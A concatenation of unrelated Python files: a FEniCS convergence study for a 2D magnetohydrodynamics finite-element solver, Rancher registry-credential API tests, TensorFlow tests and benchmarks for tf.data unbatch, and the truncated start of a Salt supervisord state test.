SolTime = np.zeros((m-1,1))
udiv = np.zeros((m-1,1))
MU = np.zeros((m-1,1))
level = np.zeros((m-1,1))
NSave = np.zeros((m-1,1))
Mave = np.zeros((m-1,1))
TotalTime = np.zeros((m-1,1))

nn = 2
dim = 2
ShowResultPlots = 'yes'
split = 'Linear'
# NOTE(review): MU is rebound to the scalar 1.0 inside the loop below, so this
# array entry appears to be a leftover -- confirm before relying on MU here.
MU[0]= 1e0
# Main convergence study: for each refinement level build the mixed MHD
# system, run a Picard iteration solved with a direct (MUMPS LU) solver,
# and record errors/timings.  Python 2 script (print statements, xrange).
for xx in xrange(1,m):
    print xx
    level[xx-1] = xx+1
    nn = 2**(level[xx-1])
    # Create mesh and define function space
    nn = int(nn)
    NN[xx-1] = nn/2
    # parameters["form_compiler"]["quadrature_degree"] = 6
    # parameters = CP.ParameterSetup()
    mesh = UnitSquareMesh(nn,nn)

    # Mixed space: N1curl (magnetic) x CG velocity x DG pressure x CG multiplier.
    order = 1
    parameters['reorder_dofs_serial'] = False
    Velocity = VectorFunctionSpace(mesh, "CG", order)
    Pressure = FunctionSpace(mesh, "DG", order-1)
    Magnetic = FunctionSpace(mesh, "N1curl", order)
    Lagrange = FunctionSpace(mesh, "CG", order)
    W = MixedFunctionSpace([Magnetic, Velocity,Pressure, Lagrange])
    # W = Velocity*Pressure*Magnetic*Lagrange
    Velocitydim[xx-1] = Velocity.dim()
    Pressuredim[xx-1] = Pressure.dim()
    Magneticdim[xx-1] = Magnetic.dim()
    Lagrangedim[xx-1] = Lagrange.dim()
    Wdim[xx-1] = W.dim()
    print "\n\nW: ",Wdim[xx-1],"Velocity: ",Velocitydim[xx-1],"Pressure: ",Pressuredim[xx-1],"Magnetic: ",Magneticdim[xx-1],"Lagrange: ",Lagrangedim[xx-1],"\n\n"
    dim = [Magnetic.dim(), Velocity.dim(), Pressure.dim(), Lagrange.dim()]

    def boundary(x, on_boundary):
        # Dirichlet conditions apply on the whole boundary.
        return on_boundary

    # Manufactured exact solution and the corresponding forcing terms.
    u0, p0,b0, r0, Laplacian, Advection, gradPres,CurlCurl, gradR, NS_Couple, M_Couple = ExactSol.MHD2D(4,1)

    # Boundary conditions on velocity (subspace 1), magnetic field (0) and
    # multiplier (3); pressure is unconstrained.
    bcu = DirichletBC(W.sub(1),u0, boundary)
    bcb = DirichletBC(W.sub(0),b0, boundary)
    bcr = DirichletBC(W.sub(3),r0, boundary)
    # bc = [u0,p0,b0,r0]
    bcs = [bcu,bcb,bcr]
    FSpaces = [Velocity,Pressure,Magnetic,Lagrange]

    (u, p, b, r) = TrialFunctions(W)
    (v, q, c,s ) = TestFunctions(W)

    # Physical parameters: coupling constant, magnetic permeability, viscosity.
    kappa = 1.0
    Mu_m =1e1
    MU = 1.0

    IterType = 'Full'

    # Right-hand sides assembled from the manufactured solution.
    F_NS = -MU*Laplacian+Advection+gradPres-kappa*NS_Couple
    if kappa == 0:
        F_M = Mu_m*CurlCurl+gradR -kappa*M_Couple
    else:
        F_M = Mu_m*kappa*CurlCurl+gradR -kappa*M_Couple
    params = [kappa,Mu_m,MU]

    # MO.PrintStr("Preconditioning MHD setup",5,"+","\n\n","\n\n")
    HiptmairMatrices = PrecondSetup.MagneticSetup(Magnetic, Lagrange, b0, r0, 1e-6)
    MO.PrintStr("Setting up MHD initial guess",5,"+","\n\n","\n\n")
    u_k,p_k,b_k,r_k = common.InitialGuess(FSpaces,[u0,p0,b0,r0],[F_NS,F_M],params,HiptmairMatrices,1e-6,Neumann=Expression(("0","0")),options ="New", FS = "DG")

    # Normalize the pressure to zero mean (pressure is defined up to a constant).
    ones = Function(Pressure)
    ones.vector()[:]=(0*ones.vector().array()+1)
    # pConst = - assemble(p_k*dx)/assemble(ones*dx)
    p_k.vector()[:] += - assemble(p_k*dx)/assemble(ones*dx)
    x = Iter.u_prev(u_k,b_k,p_k,r_k)

    KSPlinearfluids, MatrixLinearFluids = PrecondSetup.FluidLinearSetup(Pressure, MU)
    kspFp, Fp = PrecondSetup.FluidNonLinearSetup(Pressure, MU, u_k)
    # plot(b_k)

    # Variational forms for the Picard linearization.
    ns,maxwell,CoupleTerm,Lmaxwell,Lns = forms.MHD2D(mesh, W,F_M,F_NS, u_k,b_k,params,IterType,"DG", SaddlePoint = "number2")
    RHSform = forms.PicardRHS(mesh, W, u_k, p_k, b_k, r_k, params,"DG",SaddlePoint = "number2")

    # Homogeneous BCs for the update problem solved at each Picard step.
    # NOTE(review): subspace indices here (0=u, 1=b) differ from the first set
    # of BCs above (1=u, 0=b) -- confirm which ordering matches `forms.MHD2D`.
    bcu = DirichletBC(W.sub(0),Expression(("0.0","0.0")), boundary)
    bcb = DirichletBC(W.sub(1),Expression(("0.0","0.0")), boundary)
    bcr = DirichletBC(W.sub(3),Expression(("0.0")), boundary)
    bcs = [bcu,bcb,bcr]

    eps = 1.0  # error measure ||u-u_k||
    tol = 1.0E-4  # tolerance
    iter = 0  # iteration counter
    maxiter = 40  # max no of iterations allowed
    SolutionTime = 0
    outer = 0
    # parameters['linear_algebra_backend'] = 'uBLAS'

    # FSpaces = [Velocity,Magnetic,Pressure,Lagrange]

    # For the "CD" (constant-matrix) scheme the system matrix is assembled once.
    if IterType == "CD":
        AA, bb = assemble_system(maxwell+ns, (Lmaxwell + Lns) - RHSform, bcs)
        A,b = CP.Assemble(AA,bb)
        # u = b.duplicate()
        # P = CP.Assemble(PP)

    # PETSc index sets for the velocity / fluid / magnetic sub-blocks.
    u_is = PETSc.IS().createGeneral(range(Velocity.dim()))
    NS_is = PETSc.IS().createGeneral(range(Velocity.dim()+Pressure.dim()))
    M_is = PETSc.IS().createGeneral(range(Velocity.dim()+Pressure.dim(),W.dim()))
    OuterTol = 1e-5
    InnerTol = 1e-3
    NSits =0
    Mits =0
    TotalStart =time.time()
    SolutionTime = 0

    # Picard iteration: reassemble, solve, update, until the increment is small.
    while eps > tol and iter < maxiter:
        iter += 1
        MO.PrintStr("Iter "+str(iter),7,"=","\n\n","\n\n")
        tic()
        if IterType == "CD":
            # Only the RHS changes between iterations for the CD scheme.
            bb = assemble((Lmaxwell + Lns) - RHSform)
            for bc in bcs:
                bc.apply(bb)
            A,b = CP.Assemble(AA,bb)
            # if iter == 1
            if iter == 1:
                u = b.duplicate()
                F = A.getSubMatrix(u_is,u_is)
                kspF = NSprecondSetup.LSCKSPnonlinear(F)
        else:
            # Full scheme: reassemble the coupled system each iteration.
            AA, bb = assemble_system(maxwell+ns+CoupleTerm, (Lmaxwell + Lns) - RHSform, bcs)
            A,b = CP.Assemble(AA,bb)
            F = A.getSubMatrix(u_is,u_is)
            kspF = NSprecondSetup.LSCKSPnonlinear(F)
            # if iter == 1:
            if iter == 1:
                u = b.duplicate()
        print ("{:40}").format("MHD assemble, time: "), " ==> ",("{:4f}").format(toc()), ("{:9}").format(" time: "), ("{:4}").format(time.strftime('%X %x %Z')[0:5])

        kspFp, Fp = PrecondSetup.FluidNonLinearSetup(Pressure, MU, u_k)
        print "Inititial guess norm: ", u.norm()

        # Direct LU solve via MUMPS (the iterative path is commented out below).
        # ksp.solve(b, u)
        # u,it1,it2 = S.solve(A,b,u,[NS_is,M_is],FSpaces,IterType,OuterTol,InnerTol,HiptmairMatrices,KSPlinearfluids,kspF,Fp,MatrixLinearFluids,kspFp)
        ksp = PETSc.KSP()
        ksp.create(comm=PETSc.COMM_WORLD)
        pcF = ksp.getPC()
        ksp.setType('preonly')
        pcF.setType('lu')
        OptDB = PETSc.Options()
        OptDB['pc_factor_mat_solver_package'] = "mumps"
        OptDB['pc_factor_mat_ordering_type'] = "rcm"
        ksp.setFromOptions()
        ksp.setOperators(A)

        stime = time.time()
        ksp.solve(b,u)
        Soltime = time.time()- stime
        # NSits += it1
        # Mits +=dodim
        SolutionTime = SolutionTime +Soltime

        # Split the solution, renormalize pressure, and update the Picard iterate.
        u1, p1, b1, r1, eps= Iter.PicardToleranceDecouple(u,x,FSpaces,dim,"2",iter, SaddlePoint = "Yes")
        p1.vector()[:] += - assemble(p1*dx)/assemble(ones*dx)
        u_k.assign(u1)
        p_k.assign(p1)
        b_k.assign(b1)
        r_k.assign(r1)
        # if eps > 100 and iter > 3:
        #     print 22222
        #     break
        uOld= np.concatenate((u_k.vector().array(),b_k.vector().array(),p_k.vector().array(),r_k.vector().array()), axis=0)
        x = IO.arrayToVec(uOld)

    # iter = 10000
    # u_k,b_k,epsu,epsb=Iter.PicardTolerance(x,u_k,b_k,FSpaces,dim,"inf",iter)

    # Collect the converged solution and per-level statistics.
    XX= np.concatenate((u_k.vector().array(),p_k.vector().array(),b_k.vector().array(),r_k.vector().array()), axis=0)
    print SolTime
    SolTime[xx-1] = SolutionTime/iter
    NSave[xx-1] = (float(NSits)/iter)
    Mave[xx-1] = (float(Mits)/iter)
    iterations[xx-1] = iter
    TotalTime[xx-1] = time.time() - TotalStart

    ue =u0
    pe = p0
    be = b0
    re = r0

    # Errors against the manufactured exact solution.
    dim = [Velocity.dim(), Pressure.dim(), Magnetic.dim(),Lagrange.dim()]
    ExactSolution = [ue,pe,be,re]
    errL2u[xx-1], errH1u[xx-1], errL2p[xx-1], errL2b[xx-1], errCurlb[xx-1], errL2r[xx-1], errH1r[xx-1] = Iter.Errors(XX,mesh,FSpaces,ExactSolution,order,dim, "DG")

    # Observed convergence order = log2 of the error ratio between levels.
    if xx > 1:
        l2uorder[xx-1] = np.abs(np.log2(errL2u[xx-2]/errL2u[xx-1]))
        H1uorder[xx-1] = np.abs(np.log2(errH1u[xx-2]/errH1u[xx-1]))
        l2porder[xx-1] = np.abs(np.log2(errL2p[xx-2]/errL2p[xx-1]))
        l2border[xx-1] = np.abs(np.log2(errL2b[xx-2]/errL2b[xx-1]))
        Curlborder[xx-1] = np.abs(np.log2(errCurlb[xx-2]/errCurlb[xx-1]))
        l2rorder[xx-1] = np.abs(np.log2(errL2r[xx-2]/errL2r[xx-1]))
        H1rorder[xx-1] = np.abs(np.log2(errH1r[xx-2]/errH1r[xx-1]))
import pandas as pd

# Convergence table for the fluid variables (velocity and pressure).
LatexTitles = ["l","DoFu","Dofp","V-L2","L2-order","V-H1","H1-order","P-L2","PL2-order"]
LatexValues = np.concatenate((level,Velocitydim,Pressuredim,errL2u,l2uorder,errH1u,H1uorder,errL2p,l2porder), axis=1)
LatexTable = pd.DataFrame(LatexValues, columns = LatexTitles)
pd.set_option('precision',3)
LatexTable = MO.PandasFormat(LatexTable,"V-L2","%2.4e")
LatexTable = MO.PandasFormat(LatexTable,'V-H1',"%2.4e")
LatexTable = MO.PandasFormat(LatexTable,"H1-order","%1.2f")
LatexTable = MO.PandasFormat(LatexTable,'L2-order',"%1.2f")
LatexTable = MO.PandasFormat(LatexTable,"P-L2","%2.4e")
LatexTable = MO.PandasFormat(LatexTable,'PL2-order',"%1.2f")
print LatexTable

# Convergence table for the magnetic variables.
print "\n\n Magnetic convergence"
MagneticTitles = ["l","B DoF","R DoF","B-L2","L2-order","B-Curl","HCurl-order"]
MagneticValues = np.concatenate((level,Magneticdim,Lagrangedim,errL2b,l2border,errCurlb,Curlborder),axis=1)
MagneticTable= pd.DataFrame(MagneticValues, columns = MagneticTitles)
pd.set_option('precision',3)
MagneticTable = MO.PandasFormat(MagneticTable,"B-Curl","%2.4e")
MagneticTable = MO.PandasFormat(MagneticTable,'B-L2',"%2.4e")
MagneticTable = MO.PandasFormat(MagneticTable,"L2-order","%1.2f")
MagneticTable = MO.PandasFormat(MagneticTable,'HCurl-order',"%1.2f")
print MagneticTable

# Optional multiplier-convergence and iteration tables (disabled).
# print "\n\n Lagrange convergence"
# LagrangeTitles = ["l","SolTime","B DoF","R DoF","R-L2","L2-order","R-H1","H1-order"]
# LagrangeValues = np.concatenate((level,SolTime,Magneticdim,Lagrangedim,errL2r,l2rorder,errH1r,H1rorder),axis=1)
# LagrangeTable= pd.DataFrame(LagrangeValues, columns = LagrangeTitles)
# pd.set_option('precision',3)
# LagrangeTable = MO.PandasFormat(LagrangeTable,"R-L2","%2.4e")
# LagrangeTable = MO.PandasFormat(LagrangeTable,'R-H1',"%2.4e")
# LagrangeTable = MO.PandasFormat(LagrangeTable,"H1-order","%1.2f")
# LagrangeTable = MO.PandasFormat(LagrangeTable,'L2-order',"%1.2f")
# print LagrangeTable

# print "\n\n Iteration table"
# if IterType == "Full":
#     IterTitles = ["l","DoF","AV solve Time","Total picard time","picard iterations","Av Outer its","Av Inner its",]
# else:
#     IterTitles = ["l","DoF","AV solve Time","Total picard time","picard iterations","Av NS iters","Av M iters"]
# IterValues = np.concatenate((level,Wdim,SolTime,TotalTime,iterations,NSave,Mave),axis=1)
# IterTable= pd.DataFrame(IterValues, columns = IterTitles)
# if IterType == "Full":
#     IterTable = MO.PandasFormat(IterTable,'Av Outer its',"%2.1f")
#     IterTable = MO.PandasFormat(IterTable,'Av Inner its',"%2.1f")
# else:
#     IterTable = MO.PandasFormat(IterTable,'Av NS iters',"%2.1f")
#     IterTable = MO.PandasFormat(IterTable,'Av M iters',"%2.1f")
# print IterTable.to_latex()

# print " \n  Outer Tol:  ",OuterTol, "Inner Tol:   ", InnerTol

# # # if (ShowResultPlots == 'yes'):

# plot(u_k)
# plot(interpolate(ue,Velocity))

# plot(p_k)

# plot(interpolate(pe,Pressure))

# plot(b_k)
# plot(interpolate(be,Magnetic))

# plot(r_k)
# plot(interpolate(re,Lagrange))

# interactive()

# Keep plot windows open at the end of the run.
interactive()
| |
from common_fixtures import * # NOQA
from gdapi import ApiError
# Image used by the docker-backed tests below.
TEST_IMAGE = 'ibuildthecloud/helloworld'
TEST_IMAGE_LATEST = TEST_IMAGE + ':latest'
TEST_IMAGE_UUID = 'docker:' + TEST_IMAGE

# Marker that skips docker-dependent tests when DOCKER_TEST is disabled.
if_docker = pytest.mark.skipif("os.environ.get('DOCKER_TEST') == 'false'",
                               reason='DOCKER_TEST is not set')
def _create_registry(client):
    """Create a registry with a random server address and wait for it."""
    address = 'server{0}.io'.format(random_num())
    reg = client.create_registry(serverAddress=address,
                                 name='Server')
    reg = client.wait_success(reg)
    assert reg.serverAddress == address
    assert reg.name == 'Server'
    return reg
def _create_registry_and_credential(client):
    """Create a registry plus a credential; return (credential, registry)."""
    reg = _create_registry(client)
    cred = client.wait_success(client.create_registry_credential(
        registryId=reg.id,
        publicValue='rancher',
        secretValue='rancher'))
    assert cred is not None
    assert cred.kind == 'registryCredential'
    assert cred.registryId == reg.id
    assert cred.publicValue == 'rancher'
    assert cred.secretValue is None  # the secret is never echoed back
    return cred, reg
@if_docker
def test_create_container_with_registry_credential(client, context):
    """A container can reference a registry credential at creation time."""
    cred, _ = _create_registry_and_credential(client)

    container = client.create_container(name='test',
                                        imageUuid=TEST_IMAGE_UUID,
                                        startOnCreate=False,
                                        registryCredentialId=cred.id)

    assert container is not None
    assert container.registryCredentialId == cred.id
    assert container.startOnCreate is False
    assert container.imageUuid == TEST_IMAGE_UUID
# NOTE(review): the leading underscore keeps pytest from collecting this test;
# it appears deliberately disabled (requires a real registry.rancher.io
# credential) -- confirm before re-enabling.
@if_docker
def _test_create_container_with_real_registry_credential(client,
                                                         docker_context):
    reg_cred, registry = _create_registry_and_credential(client)

    # Pull from a private registry using the created credential.
    uuid = 'docker:registry.rancher.io/rancher/loop'
    container = client.create_container(name='test',
                                        imageUuid=uuid,
                                        registryCredentialId=reg_cred.id)
    assert container is not None
    assert container.registryCredentialId == reg_cred.id
    assert container.imageUuid == uuid

    container = client.wait_success(container)
    assert container.state == 'running'
def _crud_registry(client):
    """Walk a registry through activate -> deactivate -> delete."""
    reg = client.wait_success(_create_registry(client))
    assert reg.state == 'active'

    reg = client.wait_success(reg.deactivate())
    assert reg.state == 'inactive'

    reg = client.wait_success(client.delete(reg))
    assert reg.state == 'removed'
def _crud_registry_credential(client):
    """Walk a registry credential through its full lifecycle, incl. update."""
    cred, _ = _create_registry_and_credential(client)

    cred = client.wait_success(cred)
    assert cred.state == 'active'

    cred = client.wait_success(cred.deactivate())
    assert cred.state == 'inactive'

    cred = client.wait_success(client.update(cred, {
        'publicValue': 'test',
        'secretValue': 'rancher45',
    }))
    assert cred.publicValue == 'test'

    cred = client.wait_success(client.delete(cred))
    assert cred.state == 'removed'
def test_crud_registry(client):
    # Lifecycle assertions live in the shared helper.
    _crud_registry(client)
def test_crud_registry_credential(client):
    # Lifecycle assertions live in the shared helper.
    _crud_registry_credential(client)
def test_deleting_registry_deletes_credentials(client):
    """Removing a registry should cascade-remove its credentials."""
    reg_cred, registry = _create_registry_and_credential(client)

    registry = client.wait_success(registry.deactivate())
    registry = client.delete(registry)
    registry = client.wait_success(registry)
    assert registry.state == 'removed'

    def is_state():
        # Poll until the credential has been cascaded to 'removed'.
        # (A stray Python-2 debug `print cred.state` was removed here; it was
        # noise and a syntax error under Python 3.)
        cred = client.reload(reg_cred)
        if cred.state == 'removed':
            return cred
        return False

    reg_cred = wait_for(is_state)
    assert reg_cred.state == 'removed'
def test_container_image_and_registry_credential(client,
                                                 super_client):
    """An image hosted on a credentialed server picks up that credential."""
    address = 'server{0}.io'.format(random_num())
    registry = client.wait_success(
        client.create_registry(serverAddress=address, name=random_str()))
    credential = client.wait_success(client.create_registry_credential(
        registryId=registry.id,
        publicValue='rancher',
        secretValue='rancher'))

    # Image UUID whose host part matches the registry's server address.
    image_uuid = 'docker:' + address + '/rancher/authorized:latest'
    container = client.create_container(imageUuid=image_uuid,
                                        name="test" + random_str(),
                                        startOnCreate=False)
    container = super_client.wait_success(container)

    assert container.registryCredentialId == credential.id
def test_duplicate_server_addresses(client):
    """Two registries in one project cannot share a server address."""
    address = 'server{0}.io'.format(random_num())
    first = client.create_registry(serverAddress=address, name=random_str())
    client.wait_success(first)

    with pytest.raises(ApiError) as e:
        client.create_registry(serverAddress=address, name=random_str())
    assert e.value.error.status == 400
    assert e.value.error.code == 'ServerAddressUsed'
def test_create_same_registry_different_projects(admin_user_client):
    """The same server address is allowed when the projects differ."""
    address = 'server{0}.io'.format(random_num())

    for ctx in (create_context(admin_user_client, create_project=True),
                create_context(admin_user_client, create_project=True)):
        ctx.client.wait_success(ctx.client.create_registry(
            serverAddress=address, name=random_str()))
def test_registry_credentials(client, super_client, admin_user_client):
    """Secret values are only visible to sufficiently privileged callers."""
    # ordinary project member: secret is hidden on create
    registry = _create_registry(client)
    cred = client.wait_success(client.create_registry_credential(
        registryId=registry.id,
        publicValue='rancher',
        secretValue='rancher'))
    assert cred is not None
    assert cred.secretValue is None

    # project admin: the secret comes back
    projectadmin_client = create_context(admin_user_client,
                                         create_project=False,
                                         add_host=False,
                                         kind='projectadmin').user_client
    registry = _create_registry(projectadmin_client)
    cred = projectadmin_client.wait_success(
        projectadmin_client.create_registry_credential(
            registryId=registry.id,
            publicValue='rancher',
            secretValue='rancher'))
    assert cred is not None
    assert cred.secretValue is not None

    # a regular client cannot elevate itself by passing _role
    creds = client.list_registryCredential(publicValue=cred.publicValue,
                                           _role='projectadmin')
    assert len(creds) >= 1
    assert creds[0].secretValue is None

    # only super admin can pass the role
    creds = super_client.list_registryCredential(
        publicValue=cred.publicValue, _role='projectadmin')
    assert len(creds) >= 1
    assert creds[0].secretValue is not None

    # validate that you can't pass other roles than projectadmin
    creds = client.list_registryCredential(publicValue=cred.publicValue,
                                           _role='admin')
    assert len(creds) >= 1
    assert creds[0].secretValue is None
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.experimental.unbatch()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from absl.testing import parameterized
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class UnbatchTest(test_base.DatasetTestBase, parameterized.TestCase):
  """Graph-mode tests for `tf.data.experimental.unbatch()`."""

  def testUnbatchWithUnknownRankInput(self):
    # The placeholder has unknown rank, so the batch dimension must be
    # discovered at runtime from the fed value.
    placeholder = array_ops.placeholder(dtypes.int32)
    dataset = dataset_ops.Dataset.from_tensors(placeholder).apply(
        batching.unbatch())
    iterator = dataset.make_initializable_iterator()
    next_elem = iterator.get_next()

    with self.cached_session() as sess:
      sess.run(iterator.initializer, feed_dict={placeholder: [0, 1, 2, 3]})
      for i in range(4):
        self.assertEqual(i, sess.run(next_elem))
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(next_elem)

  def testUnbatchScalarDataset(self):
    # batch(2) then unbatch() should round-trip a tuple of scalar components
    # and preserve the output types.
    data = tuple([math_ops.range(10) for _ in range(3)])
    data = dataset_ops.Dataset.from_tensor_slices(data)
    expected_types = (dtypes.int32,) * 3
    data = data.batch(2)
    self.assertEqual(expected_types, data.output_types)
    data = data.apply(batching.unbatch())
    self.assertEqual(expected_types, data.output_types)

    iterator = data.make_one_shot_iterator()
    op = iterator.get_next()

    with self.cached_session() as sess:
      for i in range(10):
        self.assertEqual((i,) * 3, sess.run(op))

      with self.assertRaises(errors.OutOfRangeError):
        sess.run(op)

  def testUnbatchDatasetWithStrings(self):
    # Mixed dtypes (int32, string, int32) survive the batch/unbatch round trip.
    data = tuple([math_ops.range(10) for _ in range(3)])
    data = dataset_ops.Dataset.from_tensor_slices(data)
    data = data.map(lambda x, y, z: (x, string_ops.as_string(y), z))
    expected_types = (dtypes.int32, dtypes.string, dtypes.int32)
    data = data.batch(2)
    self.assertEqual(expected_types, data.output_types)
    data = data.apply(batching.unbatch())
    self.assertEqual(expected_types, data.output_types)

    iterator = data.make_one_shot_iterator()
    op = iterator.get_next()

    with self.cached_session() as sess:
      for i in range(10):
        self.assertEqual((i, compat.as_bytes(str(i)), i), sess.run(op))

      with self.assertRaises(errors.OutOfRangeError):
        sess.run(op)

  def testUnbatchDatasetWithSparseTensor(self):
    # A 10x10 diagonal sparse tensor: unbatch -> batch(5) -> unbatch yields
    # the individual diagonal rows.
    st = sparse_tensor.SparseTensorValue(
        indices=[[i, i] for i in range(10)],
        values=list(range(10)),
        dense_shape=[10, 10])
    data = dataset_ops.Dataset.from_tensors(st)
    data = data.apply(batching.unbatch())
    data = data.batch(5)
    data = data.apply(batching.unbatch())
    iterator = data.make_one_shot_iterator()
    next_element = iterator.get_next()

    with self.cached_session() as sess:
      for i in range(10):
        st_row = sess.run(next_element)
        self.assertEqual([i], st_row.indices)
        self.assertEqual([i], st_row.values)
        self.assertEqual([10], st_row.dense_shape)
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(next_element)

  def testUnbatchDatasetWithDenseAndSparseTensor(self):
    # Same as above, but each element pairs a dense scalar with a sparse row.
    st = sparse_tensor.SparseTensorValue(
        indices=[[i, i] for i in range(10)],
        values=list(range(10)),
        dense_shape=[10, 10])
    data = dataset_ops.Dataset.from_tensors((list(range(10)), st))
    data = data.apply(batching.unbatch())
    data = data.batch(5)
    data = data.apply(batching.unbatch())
    iterator = data.make_one_shot_iterator()
    next_element = iterator.get_next()

    with self.cached_session() as sess:
      for i in range(10):
        dense_elem, st_row = sess.run(next_element)
        self.assertEqual(i, dense_elem)
        self.assertEqual([i], st_row.indices)
        self.assertEqual([i], st_row.values)
        self.assertEqual([10], st_row.dense_shape)
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(next_element)

  def testUnbatchSingleElementTupleDataset(self):
    # Nested single-element tuples keep their structure through unbatch.
    data = tuple([(math_ops.range(10),) for _ in range(3)])
    data = dataset_ops.Dataset.from_tensor_slices(data)
    expected_types = ((dtypes.int32,),) * 3
    data = data.batch(2)
    self.assertEqual(expected_types, data.output_types)
    data = data.apply(batching.unbatch())
    self.assertEqual(expected_types, data.output_types)

    iterator = data.make_one_shot_iterator()
    op = iterator.get_next()

    with self.cached_session() as sess:
      for i in range(10):
        self.assertEqual(((i,),) * 3, sess.run(op))

      with self.assertRaises(errors.OutOfRangeError):
        sess.run(op)

  def testUnbatchMultiElementTupleDataset(self):
    # Multi-element tuples of (int, string) components.
    data = tuple([(math_ops.range(10 * i, 10 * i + 10),
                   array_ops.fill([10], "hi")) for i in range(3)])
    data = dataset_ops.Dataset.from_tensor_slices(data)
    expected_types = ((dtypes.int32, dtypes.string),) * 3
    data = data.batch(2)
    self.assertAllEqual(expected_types, data.output_types)
    data = data.apply(batching.unbatch())
    self.assertAllEqual(expected_types, data.output_types)

    iterator = data.make_one_shot_iterator()
    op = iterator.get_next()

    with self.cached_session() as sess:
      for i in range(10):
        self.assertEqual(((i, b"hi"), (10 + i, b"hi"), (20 + i, b"hi")),
                         sess.run(op))

      with self.assertRaises(errors.OutOfRangeError):
        sess.run(op)

  def testUnbatchEmpty(self):
    # Unbatching zero-length components produces an immediately-exhausted
    # dataset rather than an error.
    data = dataset_ops.Dataset.from_tensors(
        (constant_op.constant([]), constant_op.constant([], shape=[0, 4]),
         constant_op.constant([], shape=[0, 4, 0])))
    data = data.apply(batching.unbatch())
    iterator = data.make_one_shot_iterator()
    next_element = iterator.get_next()

    with self.cached_session() as sess:
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(next_element)

  def testUnbatchStaticShapeMismatch(self):
    # Statically-known mismatched batch dimensions are rejected at graph
    # construction time.
    data = dataset_ops.Dataset.from_tensors((np.arange(7), np.arange(8),
                                             np.arange(9)))
    with self.assertRaises(ValueError):
      data.apply(batching.unbatch())

  def testUnbatchDynamicShapeMismatch(self):
    # Mismatches only visible at runtime surface as InvalidArgumentError.
    ph1 = array_ops.placeholder(dtypes.int32, shape=[None])
    ph2 = array_ops.placeholder(dtypes.int32, shape=None)
    data = dataset_ops.Dataset.from_tensors((ph1, ph2))
    data = data.apply(batching.unbatch())
    iterator = data.make_initializable_iterator()
    next_element = iterator.get_next()

    with self.cached_session() as sess:
      # Mismatch in the 0th dimension.
      sess.run(
          iterator.initializer,
          feed_dict={
              ph1: np.arange(7).astype(np.int32),
              ph2: np.arange(8).astype(np.int32)
          })
      with self.assertRaises(errors.InvalidArgumentError):
        sess.run(next_element)

      # No 0th dimension (i.e. scalar value) for one component.
      sess.run(
          iterator.initializer,
          feed_dict={
              ph1: np.arange(7).astype(np.int32),
              ph2: 7
          })
      with self.assertRaises(errors.InvalidArgumentError):
        sess.run(next_element)
class UnbatchBenchmark(test.Benchmark):
  """Benchmarks comparing the fused `unbatch()` op with the older
  `flat_map(from_tensor_slices)` implementation.

  The two public benchmark methods previously duplicated the whole harness;
  the shared timing loop now lives in `_benchmark_unbatch`.
  """

  def _benchmark_unbatch(self, unbatch_fn, label, name_template):
    """Times unbatching across a range of batch sizes.

    Args:
      unbatch_fn: Callable mapping a batched `Dataset` to its unbatched form.
      label: Human-readable label used in the printed summary.
      name_template: Format string (taking the batch size) for the reported
        benchmark name.
    """
    batch_sizes = [1, 2, 5, 10, 20, 50]
    elems_per_trial = 10000
    with ops.Graph().as_default():
      dataset = dataset_ops.Dataset.from_tensors("element").repeat(None)
      batch_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
      dataset = dataset.batch(batch_size_placeholder)
      dataset = unbatch_fn(dataset)
      # skip() forces `elems_per_trial` elements to be produced per step.
      dataset = dataset.skip(elems_per_trial)
      iterator = dataset.make_initializable_iterator()
      next_element = iterator.get_next()

      with session.Session() as sess:
        for batch_size in batch_sizes:
          deltas = []
          for _ in range(5):
            sess.run(
                iterator.initializer,
                feed_dict={batch_size_placeholder: batch_size})
            start = time.time()
            sess.run(next_element.op)
            end = time.time()
            deltas.append((end - start) / elems_per_trial)
          median_wall_time = np.median(deltas)
          print("Unbatch (%s) batch size: %d Median wall time per element:"
                " %f microseconds" %
                (label, batch_size, median_wall_time * 1e6))
          self.report_benchmark(
              iters=10000,
              wall_time=median_wall_time,
              name=name_template % batch_size)

  def benchmarkNativeUnbatch(self):
    self._benchmark_unbatch(
        lambda d: d.apply(batching.unbatch()),
        label="native",
        name_template="benchmark_unbatch_dataset_native_batch_size_%d")

  # Include a benchmark of the previous `unbatch()` implementation that uses
  # a composition of more primitive ops. Eventually we'd hope to generate code
  # that is as good in both cases.
  def benchmarkOldUnbatchImplementation(self):
    self._benchmark_unbatch(
        lambda d: d.flat_map(dataset_ops.Dataset.from_tensor_slices),
        label="unfused",
        name_template="benchmark_unbatch_dataset_unfused_batch_size_%d")
# Standard TensorFlow test entry point; runs all tests/benchmarks in the file.
if __name__ == "__main__":
  test.main()
| |
"""
Tests for the supervisord state
"""
# Import python libs
import os
import subprocess
import time
import salt.utils.path
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
from tests.support.case import ModuleCase
from tests.support.mixins import SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
@skipIf(
    salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, "virtualenv not installed"
)
@skipIf(salt.utils.path.which("supervisorctl") is None, "supervisord not installed")
class SupervisordTest(ModuleCase, SaltReturnAssertsMixin):
    """
    Validate the supervisord states.
    """

    def setUp(self):
        """Create (once) a virtualenv with supervisor pip-installed into it."""
        super().setUp()
